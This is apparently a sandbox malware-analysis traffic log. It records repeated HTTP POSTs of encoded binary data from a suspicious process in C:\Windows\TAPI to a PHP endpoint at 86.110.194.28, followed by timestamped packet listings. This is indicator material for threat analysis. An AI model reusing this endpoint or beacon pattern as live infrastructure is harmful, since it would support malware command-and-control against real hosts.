                                                                                                                                                                        Jan 3, 2025 07:58:51.886831045 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:51.891633034 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.891666889 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:51.891676903 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.105254889 CET805008386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.152328968 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.240370035 CET805008386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.273046970 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.324227095 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.355458975 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.410296917 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.464838028 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.538043022 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.538408041 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.538654089 CET5008580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.543066025 CET805008386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.543127060 CET5008380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.543327093 CET805008486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.543365955 CET5008480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.543427944 CET805008586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.543490887 CET5008580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.543591976 CET5008580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.548316956 CET805008586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.902462959 CET5008580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:52.907377958 CET805008586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.907398939 CET805008586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:52.907409906 CET805008586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:53.256978989 CET805008586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:53.355478048 CET5008580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.289299011 CET5009580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.289670944 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.294466019 CET805009586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:02.294522047 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:02.294560909 CET5009580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.294621944 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.320359945 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.325189114 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:02.668078899 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:02.672909975 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:02.673017025 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:02.673101902 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:02.977601051 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.027354956 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.090657949 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.090943098 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.095520973 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.096121073 CET805009686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.096200943 CET5009680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.096239090 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.096436977 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.101202965 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.214106083 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.218924999 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.219119072 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.219265938 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.224013090 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.449481964 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.454344988 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.454498053 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.574350119 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.579221964 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.579236031 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.579246044 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.785831928 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.839886904 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.905606031 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.914947987 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:03.949307919 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:03.964868069 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.034710884 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.074234009 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.150562048 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.150623083 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.150976896 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.155745029 CET805009786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.155800104 CET5009780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.155812025 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.155869007 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.156013966 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.156204939 CET805009886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.156249046 CET5009880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.160814047 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.511946917 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.516963005 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.516993046 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.517009020 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.833029985 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:04.886724949 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:04.962728024 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.011745930 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.092685938 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.093003035 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.097692013 CET805009986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.097748041 CET5009980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.097779036 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.097843885 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.097970009 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.102760077 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.449337959 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.454116106 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.454149008 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.454161882 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.794365883 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.839854956 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:05.926873922 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:05.980495930 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.064249039 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.069062948 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.070935011 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.071065903 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.075788021 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.418168068 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.423019886 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.423090935 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.423194885 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.766067028 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.808659077 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:06.895543098 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:06.949430943 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.038757086 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.039469957 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.043797970 CET805010186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.043910980 CET5010180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.044358015 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.044473886 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.044748068 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.049500942 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.402508974 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.408560038 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.408579111 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.408591986 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.733371019 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.777348995 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:07.862514019 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:07.918004036 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.015171051 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.015547037 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.020304918 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.020390034 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.020550966 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.021209955 CET805010286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.021265030 CET5010280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.025263071 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.371340990 CET5010380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:59:08.376298904 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.376317978 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.376332045 CET805010386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:59:08.707544088 CET805010386.110.194.28192.168.2.4
• 86.110.194.28
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:40.658014059 CET | 327 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:57:41.357531071 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:41.455720901 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:57:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Jan 3, 2025 07:57:41.563128948 CET | 303 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 384
Expect: 100-continue
Jan 3, 2025 07:57:41.781757116 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:42.006361008 CET | 324 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:57:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Content-Type: text/html; charset=UTF-8
Jan 3, 2025 07:57:42.006664991 CET | 303 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 384
Expect: 100-continue
Jan 3, 2025 07:57:42.225194931 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:42.450411081 CET | 324 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:57:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Content-Type: text/html; charset=UTF-8
Jan 3, 2025 07:57:42.451253891 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 1384
Expect: 100-continue
Jan 3, 2025 07:57:42.671153069 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:43.061712027 CET | 324 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:57:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:41.648694038 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Jan 3, 2025 07:57:41.996231079 CET | 2516 | OUT | Data (raw request body)
Jan 3, 2025 07:57:42.372219086 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:42.505937099 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:42 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:42.728418112 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:57:43.074203968 CET | 2516 | OUT | Data (raw request body)
Jan 3, 2025 07:57:43.425899029 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:43.557955027 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:43 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:44.251765013 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:57:44.610259056 CET | 2516 | OUT | Data (raw request body)
Jan 3, 2025 07:57:44.942687035 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:45.072609901 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:44 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:45.363059044 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:57:45.715049982 CET | 2516 | OUT | Data (raw request body)
Jan 3, 2025 07:57:46.088067055 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:46.215472937 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:45 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:48.095732927 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2000
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:57:48.449249029 CET | 2000 | OUT | Data (raw request body)
Jan 3, 2025 07:57:48.795454025 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:48.928992033 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:48 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:51.262942076 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:57:51.621124983 CET | 2516 | OUT | Data (raw request body)
Jan 3, 2025 07:57:51.965153933 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:52.082788944 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:51 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:52.722907066 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:57:53.855545044 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:57:54.214878082 CET | 2516 | OUT | Data Raw: 5b 51 5b 5b 58 5d 55 5d 54 5b 59 5a 5b 51 57 5a 5f 55 5a 59 52 52 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[[X]U]T[YZ[QWZ_UZYRRPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C).![6*U&,E>.0$>&?S!45W!8'0 '?3))#Y'$X.9
Jan 3, 2025 07:57:54.353739023 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:57:54.492264986 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T
Jan 3, 2025 07:57:54.708081007 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:57:54 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
